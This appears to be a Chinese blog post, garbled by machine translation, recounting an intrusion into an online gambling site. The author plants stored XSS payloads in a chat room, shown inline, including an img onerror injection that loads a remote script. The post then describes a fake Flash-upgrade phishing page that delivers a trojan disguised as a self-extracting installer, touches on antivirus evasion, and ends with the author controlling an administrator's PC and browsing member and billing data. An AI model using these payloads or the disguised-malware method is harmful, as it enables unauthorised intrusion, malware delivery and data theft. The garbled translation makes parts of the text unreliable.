我们必须保持良好的学习习惯，并使用这次我们通常学到的知识。

故事的原因

我几天前收到了一封电子邮件，内容如下：

您说将其发送给我有问题。我最近碰巧辞职了，我无事可做。让我们看看。

在添加了那个人的朋友之后，我偶然地聊了几个，这可能是：我说我没有钱从在线赌博中借钱，所以我请他带我去玩这个，所以我可以拿回贷款。几句话后，我向我发送了URL和邀请代码（我无法在本网站上没有邀请码注册），并要求我在网站上充电金钱。我说是的，我会先去一千。主人，你必须带我好，然后注册（后来，我没有为钱补充钱，所以他一直在摇晃我并给我发了一条消息。我感到很生气，所以我删除了他，所以聊天记录消失了，我只是指出了它，没有屏幕截图）。

脆弱性挖掘

官方网站屏幕截图

这太麻烦了，无法通过信息收集阶段。有云盾（WAF+CDN）。查看以下Yunxi指纹识别图。测试各种功能点，但没有结果。我不得不说，大多数BC安全性都做得很好。

在考虑了一段时间之后，我看到了聊天室的功能，然后去看看他们在说什么，但是我发现只有少数人来回聊天，偶尔有一些像我这样的普通成员。我觉得这是一个口号，一群导师大喊与他们下注。

专业习惯：

当您看到框时，要制作叉子，并用XSS有效载荷击中它：

1/textarea'script src=xssurl/脚本

WDNMD没有回应？它被加载了.我问其他大师，并说这种情况可能是CSP。我不会在这里解释。我最初计划放弃，但想到了如果不限制IMG怎么办。

再次吃我：

1IMG src=x OneError=s=createElement（'script'）; body.appendchild（s）; s.src='xssurl';

ding〜ding〜电话响了，多么出色的声音，有效载荷已成功执行，还有一堆cookie（或不同的域名），但现实是残酷的。该网站具有httponly，无法使用cookie，并且尚未获得历史密码，但不要灰心，我们有一种更淫秽的方式。

闪存钓鱼

由于前肛门无法移动您，让我们走到一边。不久前，我经常看到Wuchang大师的Flash Fishing操作，这非常经典。然后，我认为有一天我会使用官方Flash网站的捕鱼源代码。我很早就写了它，然后将其放在Github：Portal上。

准备

一个自由空间，免费域名（域名可以用作www.flashxxx.tk，具有相对较高的信誉），以及可以正常启动的马匹。

然后，XSS平台创建一个模块，简要说明代码，在开始时重写警报方法，并阻止URL显示屏，弹出闪存升级提示符，然后跳到网络钓鱼页面：

关于Mazi

可以在运行正常安装文件时运行mazi，野蛮姿势：使用自提取捆绑文件

为了使自由压缩的EXE文件正常运行（已更改为正常的安装文件图标），必须确保其具有减压软件。我压缩了钓鱼页的自我压缩文件，并变成了flashplayerpp_install_cn.zip。这样，他必须安装解压缩文件才能打开安装程序，并且MA ZI将自然生效。

关于杀戮

由于技术有限，我们没有在没有杀死的情况下这样做。产生的马将被毒药部分杀死和报告。我不知道该怎么杀了对手，所以我想到了一种粗俗但有效的方法。实际上，许多在下载网站上下载的文件也喜欢这样做，哈哈。

一切都准备就绪

一切都准备就绪，只需要东风，直接发送升级提示+跳跃XSS有效载荷我刚刚写道：

该页面成功弹出，如果另一方不单击确定的页面，他会保持卡住。单击确定后，我的钓鱼页将跳到我的钓鱼页面（这里的钓鱼页面还添加了一些材料，以便他可以在单击后跳回钓鱼页）

但是，一开始没有人在线，所以我单击了，看到管理员重置了聊天页面的内容。奥利曾经说过：不要害怕我们遇到的任何困难。让我们更改数字并继续越过。间歇性过境和越过十次以上后，管理员可能无法帮助它（管理员：兄弟，停止玩，我还不能安装它），最后跑了我的马。

成功启动：

在这里启动了一个，但幸运的是，这是管理员的机器，否则以前的努力将是徒劳的。

看一段时间，相反的一面正在做爱：

这很明显，您可以看到钓鱼页仍然打开，他们两个仍在讨论亏损，他们死于笑声：

我打开了一本书，但我不明白这一点：

让我们看看存储了什么好东西，两个硬盘驱动器和一个U驱动器，C驱动器驱动器一无所有：

F磁盘上有有关会员数据，账单流，管理后端配置等的信息。

停止直到：

我不会说太多。我看了在线IP，跑得很远，赚钱。我离开家乡并不容易。祝您在新的一年中和平重返祖国的拥抱。